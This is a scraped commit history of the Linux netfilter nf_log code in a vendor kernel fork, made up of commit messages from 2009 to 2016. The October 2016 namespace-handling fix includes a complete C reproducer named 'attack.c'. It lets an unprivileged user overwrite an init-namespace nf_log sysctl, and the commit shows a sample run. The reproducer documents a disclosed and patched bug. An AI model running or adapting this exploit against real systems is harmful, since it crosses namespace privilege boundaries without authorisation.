Eric Lee / smarc-fsl-linux-kernel

04 Oct, 2016

1 commit

  • dbb5918cb   netfilter: fix namespace handling in nf_log_proc_dostring ... Browse Code »

    nf_log_proc_dostring() used current's network namespace instead of the one
    corresponding to the sysctl file the write was performed on. Because the
    permission check happens at open time and the nf_log files in namespaces
    are accessible for the namespace owner, this can be abused by an
    unprivileged user to effectively write to the init namespace's nf_log
    sysctls.

    Stash the "struct net *" in extra2 - data and extra1 are already used.

    Repro code:

    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    char child_stack[1000000];

    uid_t outer_uid;
    gid_t outer_gid;
    int stolen_fd = -1;

    void writefile(char *path, char *buf) {
    int fd = open(path, O_WRONLY);
    if (fd == -1)
    err(1, "unable to open thing");
    if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "unable to write thing");
    close(fd);
    }

    int child_fn(void *p_) {
    if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
    NULL))
    err(1, "mount");

    /* Yes, we need to set the maps for the net sysctls to recognize us
    * as namespace root.
    */
    char buf[1000];
    sprintf(buf, "0 %d 1\n", (int)outer_uid);
    writefile("/proc/1/uid_map", buf);
    writefile("/proc/1/setgroups", "deny");
    sprintf(buf, "0 %d 1\n", (int)outer_gid);
    writefile("/proc/1/gid_map", buf);

    stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
    if (stolen_fd == -1)
    err(1, "open nf_log");
    return 0;
    }

    int main(void) {
    outer_uid = getuid();
    outer_gid = getgid();

    int child = clone(child_fn, child_stack + sizeof(child_stack),
    CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
    |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
    if (child == -1)
    err(1, "clone");
    int status;
    if (wait(&status) != child)
    err(1, "wait");
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child exit status bad");

    char *data = "NONE";
    if (write(stolen_fd, data, strlen(data)) != strlen(data))
    err(1, "write");
    return 0;
    }

    Repro:

    $ gcc -Wall -o attack attack.c -std=gnu99
    $ cat /proc/sys/net/netfilter/nf_log/2
    nf_log_ipv4
    $ ./attack
    $ cat /proc/sys/net/netfilter/nf_log/2
    NONE

    Because this looks like an issue with very low severity, I'm sending it to
    the public list directly.

    Signed-off-by: Jann Horn
    Signed-off-by: Pablo Neira Ayuso

    Jann Horn
     

30 Aug, 2016

1 commit

05 Jul, 2016

1 commit

  • c6ac37d8d   netfilter: nf_log: fix error on write NONE to logger choice sysctl ... Browse Code »

    It is hard to unbind nf-logger:

    echo NONE > /proc/sys/net/netfilter/nf_log/0
    bash: echo: write error: No such file or directory

    sysctl -w net.netfilter.nf_log.0=NONE
    sysctl: setting key "net.netfilter.nf_log.0": No such file or directory
    net.netfilter.nf_log.0 = NONE

    You need explicitly send '\0', for instance like:

    echo -e "NONE\0" > /proc/sys/net/netfilter/nf_log/0

    That seem to be strange, so fix it using proc_dostring.

    Now it works fine:
    modprobe nfnetlink_log
    echo nfnetlink_log > /proc/sys/net/netfilter/nf_log/0
    cat /proc/sys/net/netfilter/nf_log/0
    nfnetlink_log
    echo NONE > /proc/sys/net/netfilter/nf_log/0
    cat /proc/sys/net/netfilter/nf_log/0
    NONE

    v2: add missed error check for proc_dostring

    Signed-off-by: Pavel Tikhomirov
    Signed-off-by: Pablo Neira Ayuso

    Pavel Tikhomirov
     

23 Jun, 2016

2 commits

17 Sep, 2015

1 commit

14 Sep, 2015

1 commit

  • 205ee117d   netfilter: nf_log: don't zap all loggers on unregister ... Browse Code »

    like nf_log_unset, nf_log_unregister must not reset the list of loggers.
    Otherwise, a call to nf_log_unregister() will render loggers of other nf
    protocols unusable:

    iptables -A INPUT -j LOG
    modprobe nf_log_arp ; rmmod nf_log_arp
    iptables -A INPUT -j LOG
    iptables: No chain/target/match by that name

    Fixes: 30e0c6a6be ("netfilter: nf_log: prepare net namespace support for loggers")
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     

19 Mar, 2015

1 commit

  • 4017a7ee6   netfilter: restore rule tracing via nfnetlink_log ... Browse Code »

    Since fab4085 ("netfilter: log: nf_log_packet() as real unified
    interface"), the loginfo structure that is passed to nf_log_packet() is
    used to explicitly indicate the logger type you want to use.

    This is a problem for people tracing rules through nfnetlink_log since
    packets are always routed to the NF_LOG_TYPE logger after the
    aforementioned patch.

    We can fix this by removing the trace loginfo structures, but that still
    changes the log level from 4 to 5 for tracing messages and there may be
    someone relying on this outthere. So let's just introduce a new
    nf_log_trace() function that restores the former behaviour.

    Reported-by: Markus Kötter
    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     

23 Dec, 2014

1 commit

12 Dec, 2014

1 commit

  • 70e71ca0a   Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next ... Browse Code »

    Pull networking updates from David Miller:

    1) New offloading infrastructure and example 'rocker' driver for
    offloading of switching and routing to hardware.

    This work was done by a large group of dedicated individuals, not
    limited to: Scott Feldman, Jiri Pirko, Thomas Graf, John Fastabend,
    Jamal Hadi Salim, Andy Gospodarek, Florian Fainelli, Roopa Prabhu

    2) Start making the networking operate on IOV iterators instead of
    modifying iov objects in-situ during transfers. Thanks to Al Viro
    and Herbert Xu.

    3) A set of new netlink interfaces for the TIPC stack, from Richard
    Alpe.

    4) Remove unnecessary looping during ipv6 routing lookups, from Martin
    KaFai Lau.

    5) Add PAUSE frame generation support to gianfar driver, from Matei
    Pavaluca.

    6) Allow for larger reordering levels in TCP, which are easily
    achievable in the real world right now, from Eric Dumazet.

    7) Add a variable of napi_schedule that doesn't need to disable cpu
    interrupts, from Eric Dumazet.

    8) Use a doubly linked list to optimize neigh_parms_release(), from
    Nicolas Dichtel.

    9) Various enhancements to the kernel BPF verifier, and allow eBPF
    programs to actually be attached to sockets. From Alexei
    Starovoitov.

    10) Support TSO/LSO in sunvnet driver, from David L Stevens.

    11) Allow controlling ECN usage via routing metrics, from Florian
    Westphal.

    12) Remote checksum offload, from Tom Herbert.

    13) Add split-header receive, BQL, and xmit_more support to amd-xgbe
    driver, from Thomas Lendacky.

    14) Add MPLS support to openvswitch, from Simon Horman.

    15) Support wildcard tunnel endpoints in ipv6 tunnels, from Steffen
    Klassert.

    16) Do gro flushes on a per-device basis using a timer, from Eric
    Dumazet. This tries to resolve the conflicting goals between the
    desired handling of bulk vs. RPC-like traffic.

    17) Allow userspace to ask for the CPU upon what a packet was
    received/steered, via SO_INCOMING_CPU. From Eric Dumazet.

    18) Limit GSO packets to half the current congestion window, from Eric
    Dumazet.

    19) Add a generic helper so that all drivers set their RSS keys in a
    consistent way, from Eric Dumazet.

    20) Add xmit_more support to enic driver, from Govindarajulu
    Varadarajan.

    21) Add VLAN packet scheduler action, from Jiri Pirko.

    22) Support configurable RSS hash functions via ethtool, from Eyal
    Perry.

    * git://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next: (1820 commits)
    Fix race condition between vxlan_sock_add and vxlan_sock_release
    net/macb: fix compilation warning for print_hex_dump() called with skb->mac_header
    net/mlx4: Add support for A0 steering
    net/mlx4: Refactor QUERY_PORT
    net/mlx4_core: Add explicit error message when rule doesn't meet configuration
    net/mlx4: Add A0 hybrid steering
    net/mlx4: Add mlx4_bitmap zone allocator
    net/mlx4: Add a check if there are too many reserved QPs
    net/mlx4: Change QP allocation scheme
    net/mlx4_core: Use tasklet for user-space CQ completion events
    net/mlx4_core: Mask out host side virtualization features for guests
    net/mlx4_en: Set csum level for encapsulated packets
    be2net: Export tunnel offloads only when a VxLAN tunnel is created
    gianfar: Fix dma check map error when DMA_API_DEBUG is enabled
    cxgb4/csiostor: Don't use MASTER_MUST for fw_hello call
    net: fec: only enable mdio interrupt before phy device link up
    net: fec: clear all interrupt events to support i.MX6SX
    net: fec: reset fep link status in suspend function
    net: sock: fix access via invalid file descriptor
    net: introduce helper macro for_each_cmsghdr
    ...

    Linus Torvalds
     

06 Nov, 2014

1 commit

  • e71456ae9   netfilter: Remove checks of seq_printf() return values ... Browse Code »

    The return value of seq_printf() is soon to be removed. Remove the
    checks from seq_printf() in favor of seq_has_overflowed().

    Link: http://lkml.kernel.org/r/20141104142236.GA10239@salvia
    Acked-by: Pablo Neira Ayuso
    Cc: Patrick McHardy
    Cc: Jozsef Kadlecsik
    Cc: netfilter-devel@vger.kernel.org
    Cc: coreteam@netfilter.org
    Signed-off-by: Steven Rostedt

    Steven Rostedt (Red Hat)
     

05 Nov, 2014

1 commit

30 Oct, 2014

2 commits

14 Oct, 2014

1 commit

  • 18082746a   netfilter: replace strnicmp with strncasecmp ... Browse Code »

    The kernel used to contain two functions for length-delimited,
    case-insensitive string comparison, strnicmp with correct semantics and
    a slightly buggy strncasecmp. The latter is the POSIX name, so strnicmp
    was renamed to strncasecmp, and strnicmp made into a wrapper for the new
    strncasecmp to avoid breaking existing users.

    To allow the compat wrapper strnicmp to be removed at some point in the
    future, and to avoid the extra indirection cost, do
    s/strnicmp/strncasecmp/g.

    Signed-off-by: Rasmus Villemoes
    Cc: "David S. Miller"
    Signed-off-by: Andrew Morton
    Signed-off-by: Linus Torvalds

    Rasmus Villemoes
     

27 Jun, 2014

2 commits

  • 960649d19   netfilter: bridge: add generic packet logger ... Browse Code »

    This adds the generic plain text packet loggger for bridged packets.
    It routes the logging message to the real protocol packet logger.
    I decided not to refactor the ebt_log code for two reasons:

    1) The ebt_log output is not consistent with the IPv4 and IPv6
    Netfilter packet loggers. The output is different for no good
    reason and it adds redundant code to handle packet logging.

    2) To avoid breaking backward compatibility for applications
    outthere that are parsing the specific ebt_log output, the ebt_log
    output has been left as is. So only nftables will use the new
    consistent logging format for logged bridged packets.

    More decisions coming in this patch:

    1) This also removes ebt_log as default logger for bridged packets.
    Thus, nf_log_packet() routes packet to this new packet logger
    instead. This doesn't break backward compatibility since
    nf_log_packet() is not used to log packets in plain text format
    from anywhere in the ebtables/netfilter bridge code.

    2) The new bridge packet logger also performs a lazy request to
    register the real IPv4, ARP and IPv6 netfilter packet loggers.
    If the real protocol logger is no available (not compiled or the
    module is not available in the system, not packet logging happens.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     
  • fab4085f4   netfilter: log: nf_log_packet() as real unified interface ... Browse Code »

    Before this patch, the nf_loginfo parameter specified the logging
    configuration in case the specified default logger was loaded. This
    patch updates the semantics of the nf_loginfo parameter in
    nf_log_packet() which now indicates the logger that you explicitly
    want to use.

    Thus, nf_log_packet() is exposed as an unified interface which
    internally routes the log message to the corresponding logger type
    by family.

    The module dependencies are expressed by the new nf_logger_find_get()
    and nf_logger_put() functions which bump the logger module refcount.
    Thus, you can not remove logger modules that are used by rules anymore.

    Another important effect of this change is that the family specific
    module is only loaded when required. Therefore, xt_LOG and nft_log
    will just trigger the autoload of the nf_log_{ip,ip6} modules
    according to the family.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     

26 Jun, 2014

2 commits

  • 27fd8d90c   netfilter: nf_log: move log buffering to core logging ... Browse Code »

    This patch moves Eric Dumazet's log buffer implementation from the
    xt_log.h header file to the core net/netfilter/nf_log.c. This also
    includes the renaming of the structure and functions to avoid possible
    undesired namespace clashes.

    This change allows us to use it from the arp and bridge packet logging
    implementation in follow up patches.

    Pablo Neira Ayuso
     
  • 5962815a6   netfilter: nf_log: use an array of loggers instead of list ... Browse Code »

    Now that legacy ulog targets are not available anymore in the tree, we
    can have up to two possible loggers:

    1) The plain text logging via kernel logging ring.
    2) The nfnetlink_log infrastructure which delivers log messages
    to userspace.

    This patch replaces the list of loggers by an array of two pointers
    per family for each possible logger and it also introduces a new field
    to the nf_logger structure which indicates the position in the logger
    array (based on the logger type).

    This prepares a follow up patch that consolidates the nf_log_packet()
    interface by allowing to specify the logger as parameter.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     

13 Jun, 2013

1 commit

  • fe2c6338f   net: Convert uses of typedef ctl_table to struct ctl_table ... Browse Code »

    Reduce the uses of this unnecessary typedef.

    Done via perl script:

    $ git grep --name-only -w ctl_table net | \
    xargs perl -p -i -e '\
    sub trim { my ($local) = @_; $local =~ s/(^\s+|\s+$)//g; return $local; } \
    s/\b(?<!struct\s)ctl_table\b(\s*\*\s*|\s+\w+)/"struct ctl_table " . trim($1)/ge'

    Reflow the modified lines that now exceed 80 columns.

    Signed-off-by: Joe Perches
    Signed-off-by: David S. Miller

    Joe Perches
     

06 Jun, 2013

1 commit

  • 143554ace   Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next ... Browse Code »

    Conflicts:
    net/netfilter/nf_log.c

    The conflict in nf_log.c is that in 'net' we added CONFIG_PROC_FS
    protection around foo_proc_entry() calls to fix a build failure,
    whereas in Pablo's tree a guard if() test around a call is
    remove_proc_entry() was removed. Trivially resolved.

    Pablo Neira Ayuso says:

    ====================
    The following patchset contains the first batch of
    Netfilter/IPVS updates for your net-next tree, they are:

    * Three patches with improvements and code refactorization
    for nfnetlink_queue, from Florian Westphal.

    * FTP helper now parses replies without brackets, as RFC1123
    recommends, from Jeff Mahoney.

    * Rise a warning to tell everyone about ULOG deprecation,
    NFLOG has been already in the kernel tree for long time
    and supersedes the old logging over netlink stub, from
    myself.

    * Don't panic if we fail to load netfilter core framework,
    just bail out instead, from myself.

    * Add cond_resched_rcu, used by IPVS to allow rescheduling
    while walking over big hashtables, from Simon Horman.

    * Change type of IPVS sysctl_sync_qlen_max sysctl to avoid
    possible overflow, from Zhang Yanfei.

    * Use strlcpy instead of strncpy to skip zeroing of already
    initialized area to write the extension names in ebtables,
    from Chen Gang.

    * Use already existing per-cpu notrack object from xt_CT,
    from Eric Dumazet.

    * Save explicit socket lookup in xt_socket now that we have
    early demux, also from Eric Dumazet.
    ====================

    Signed-off-by: David S. Miller

    David S. Miller
     

23 May, 2013

1 commit

15 May, 2013

1 commit

  • 8cdb46da0   netfilter: log: netns NULL ptr bug when calling from conntrack ... Browse Code »

    Since (69b34fb netfilter: xt_LOG: add net namespace support
    for xt_LOG), we hit this:

    [ 4224.708977] BUG: unable to handle kernel NULL pointer dereference at 0000000000000388
    [ 4224.709074] IP: [] ipt_log_packet+0x29/0x270

    when callling log functions from conntrack both in and out
    are NULL i.e. the net pointer is invalid.

    Adding struct net *net in call to nf_logfn() will secure that
    there always is a vaild net ptr.

    Reported as netfilter's bugzilla bug 818:
    https://bugzilla.netfilter.org/show_bug.cgi?id=818

    Reported-by: Ronald
    Signed-off-by: Hans Schillstrom
    Signed-off-by: Pablo Neira Ayuso

    Hans Schillstrom
     

06 May, 2013

1 commit

  • e778f56e2   netfilter: nf_{log,queue}: fix compilation without CONFIG_PROC_FS ... Browse Code »

    This patch fixes the following compilation error:

    net/netfilter/nf_log.c:373:38: error: 'struct netns_nf' has no member named 'proc_netfilter'

    if procfs is not set.

    The netns support for nf_log, nfnetlink_log and nfnetlink_queue_core
    requires CONFIG_PROC_FS in the removal path of their respective
    /proc interface since net->nf.proc_netfilter is undefined in that
    case.

    Reported-by: Fengguang Wu
    Signed-off-by: Pablo Neira Ayuso
    Acked-by: Gao feng

    Pablo Neira Ayuso
     

06 Apr, 2013

2 commits

  • 5b023fc8d   netfilter: enable per netns support for nf_loggers ... Browse Code »

    After this patch, all nf_loggers support net namespace. Still
    xt_LOG and ebt_log require syslog netns support.

    Signed-off-by: Gao feng
    Signed-off-by: Pablo Neira Ayuso

    Gao feng
     
  • 30e0c6a6b   netfilter: nf_log: prepare net namespace support for loggers ... Browse Code »

    This patch adds netns support to nf_log and it prepares netns
    support for existing loggers. It is composed of four major
    changes.

    1) nf_log_register has been split to two functions: nf_log_register
    and nf_log_set. The new nf_log_register is used to globally
    register the nf_logger and nf_log_set is used for enabling
    pernet support from nf_loggers.

    Per netns is not yet complete after this patch, it comes in
    separate follow up patches.

    2) Add net as a parameter of nf_log_bind_pf. Per netns is not
    yet complete after this patch, it only allows to bind the
    nf_logger to the protocol family from init_net and it skips
    other cases.

    3) Adapt all nf_log_packet callers to pass netns as parameter.
    After this patch, this function only works for init_net.

    4) Make the sysctl net/netfilter/nf_log pernet.

    Signed-off-by: Gao feng
    Signed-off-by: Pablo Neira Ayuso

    Gao feng
     

19 Nov, 2012

1 commit

21 Apr, 2012

2 commits

  • ec8f23ce0   net: Convert all sysctl registrations to register_net_sysctl ... Browse Code »

    This results in code with less boiler plate that is a bit easier
    to read.

    Additionally stops us from using compatibility code in the sysctl
    core, hastening the day when the compatibility code can be removed.

    Signed-off-by: Eric W. Biederman
    Acked-by: Pavel Emelyanov
    Signed-off-by: David S. Miller

    Eric W. Biederman
     
  • 5dd3df105   net: Move all of the network sysctls without a namespace into init_net. ... Browse Code »

    This makes it clearer which sysctls are relative to your current network
    namespace.

    This makes it a little less error prone by not exposing sysctls for the
    initial network namespace in other namespaces.

    This is the same way we handle all of our other network interfaces to
    userspace and I can't honestly remember why we didn't do this for
    sysctls right from the start.

    Signed-off-by: Eric W. Biederman
    Acked-by: Pavel Emelyanov
    Signed-off-by: David S. Miller

    Eric W. Biederman
     

13 Jan, 2012

1 commit

  • cf778b00e   net: reintroduce missing rcu_assign_pointer() calls ... Browse Code »

    commit a9b3cd7f32 (rcu: convert uses of rcu_assign_pointer(x, NULL) to
    RCU_INIT_POINTER) did a lot of incorrect changes, since it did a
    complete conversion of rcu_assign_pointer(x, y) to RCU_INIT_POINTER(x,
    y).

    We miss needed barriers, even on x86, when y is not NULL.

    Signed-off-by: Eric Dumazet
    CC: Stephen Hemminger
    CC: Paul E. McKenney
    Signed-off-by: David S. Miller

    Eric Dumazet
     

02 Aug, 2011

1 commit

  • a9b3cd7f3   rcu: convert uses of rcu_assign_pointer(x, NULL) to RCU_INIT_POINTER ... Browse Code »

    When assigning a NULL value to an RCU protected pointer, no barrier
    is needed. The rcu_assign_pointer, used to handle that but will soon
    change to not handle the special case.

    Convert all rcu_assign_pointer of NULL value.

    //smpl
    @@ expression P; @@

    - rcu_assign_pointer(P, NULL)
    + RCU_INIT_POINTER(P, NULL)

    //

    Signed-off-by: Stephen Hemminger
    Acked-by: Paul E. McKenney
    Signed-off-by: David S. Miller

    Stephen Hemminger
     

04 Mar, 2011

1 commit

02 Mar, 2011

1 commit

  • 9ef0298a8   netfilter: nf_log: avoid oops in (un)bind with invalid nfproto values ... Browse Code »

    Like many other places, we have to check that the array index is
    within allowed limits, or otherwise, a kernel oops and other nastiness
    can ensue when we access memory beyond the end of the array.

    [ 5954.115381] BUG: unable to handle kernel paging request at 0000004000000000
    [ 5954.120014] IP: __find_logger+0x6f/0xa0
    [ 5954.123979] nf_log_bind_pf+0x2b/0x70
    [ 5954.123979] nfulnl_recv_config+0xc0/0x4a0 [nfnetlink_log]
    [ 5954.123979] nfnetlink_rcv_msg+0x12c/0x1b0 [nfnetlink]
    ...

    The problem goes back to v2.6.30-rc1~1372~1342~31 where nf_log_bind
    was decoupled from nf_log_register.

    Reported-by: Miguel Di Ciurcio Filho ,
    via irc.freenode.net/#netfilter
    Signed-off-by: Jan Engelhardt
    Signed-off-by: Patrick McHardy

    Jan Engelhardt
     

16 Nov, 2010

1 commit

20 Aug, 2010

1 commit

11 May, 2010

1 commit

09 Apr, 2010

1 commit

  • ed86308f6   netfilter: remove invalid rcu_dereference() calls ... Browse Code »

    The CONFIG_PROVE_RCU option discovered a few invalid uses of
    rcu_dereference() in netfilter. In all these cases, the code code
    intends to check whether a pointer is already assigned when
    performing registration or whether the assigned pointer matches
    when performing unregistration. The entire registration/
    unregistration is protected by a mutex, so we don't need the
    rcu_dereference() calls.

    Reported-by: Valdis Kletnieks
    Tested-by: Valdis Kletnieks
    Signed-off-by: Patrick McHardy

    Patrick McHardy
     

08 Dec, 2009

1 commit

  • 1557d3300   Merge git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/sysctl-2.6 ... Browse Code »

    * git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/sysctl-2.6: (43 commits)
    security/tomoyo: Remove now unnecessary handling of security_sysctl.
    security/tomoyo: Add a special case to handle accesses through the internal proc mount.
    sysctl: Drop & in front of every proc_handler.
    sysctl: Remove CTL_NONE and CTL_UNNUMBERED
    sysctl: kill dead ctl_handler definitions.
    sysctl: Remove the last of the generic binary sysctl support
    sysctl net: Remove unused binary sysctl code
    sysctl security/tomoyo: Don't look at ctl_name
    sysctl arm: Remove binary sysctl support
    sysctl x86: Remove dead binary sysctl support
    sysctl sh: Remove dead binary sysctl support
    sysctl powerpc: Remove dead binary sysctl support
    sysctl ia64: Remove dead binary sysctl support
    sysctl s390: Remove dead sysctl binary support
    sysctl frv: Remove dead binary sysctl support
    sysctl mips/lasat: Remove dead binary sysctl support
    sysctl drivers: Remove dead binary sysctl support
    sysctl crypto: Remove dead binary sysctl support
    sysctl security/keys: Remove dead binary sysctl support
    sysctl kernel: Remove binary sysctl logic
    ...

    Linus Torvalds
     

20 Nov, 2009

1 commit

  • 6440fe059   netfilter: nf_log: fix sleeping function called from invalid context in seq_show() ... Browse Code »

    [ 171.925285] BUG: sleeping function called from invalid context at kernel/mutex.c:280
    [ 171.925296] in_atomic(): 1, irqs_disabled(): 0, pid: 671, name: grep
    [ 171.925306] 2 locks held by grep/671:
    [ 171.925312] #0: (&p->lock){+.+.+.}, at: [] seq_read+0x25/0x36c
    [ 171.925340] #1: (rcu_read_lock){.+.+..}, at: [] seq_start+0x0/0x44
    [ 171.925372] Pid: 671, comm: grep Not tainted 2.6.31.6-4-netbook #3
    [ 171.925380] Call Trace:
    [ 171.925398] [] ? __debug_show_held_locks+0x1e/0x20
    [ 171.925414] [] __might_sleep+0xfb/0x102
    [ 171.925430] [] mutex_lock_nested+0x1c/0x2ad
    [ 171.925444] [] seq_show+0x74/0x127
    [ 171.925456] [] seq_read+0x1b4/0x36c
    [ 171.925469] [] ? seq_read+0x0/0x36c
    [ 171.925483] [] proc_reg_read+0x60/0x74
    [ 171.925496] [] ? proc_reg_read+0x0/0x74
    [ 171.925510] [] vfs_read+0x87/0x110
    [ 171.925523] [] sys_read+0x3b/0x60
    [ 171.925538] [] syscall_call+0x7/0xb

    Fix it by replacing RCU with nf_log_mutex.

    Reported-by: "Yin, Kangkai"
    Signed-off-by: Wu Fengguang
    Signed-off-by: Patrick McHardy
    Signed-off-by: David S. Miller

    Patrick McHardy
     

12 Nov, 2009

1 commit

  • f8572d8f2   sysctl net: Remove unused binary sysctl code ... Browse Code »

    Now that sys_sysctl is a compatiblity wrapper around /proc/sys
    all sysctl strategy routines, and all ctl_name and strategy
    entries in the sysctl tables are unused, and can be
    revmoed.

    In addition neigh_sysctl_register has been modified to no longer
    take a strategy argument and it's callers have been modified not
    to pass one.

    Cc: "David Miller"
    Cc: Hideaki YOSHIFUJI
    Cc: netdev@vger.kernel.org
    Signed-off-by: Eric W. Biederman

    Eric W. Biederman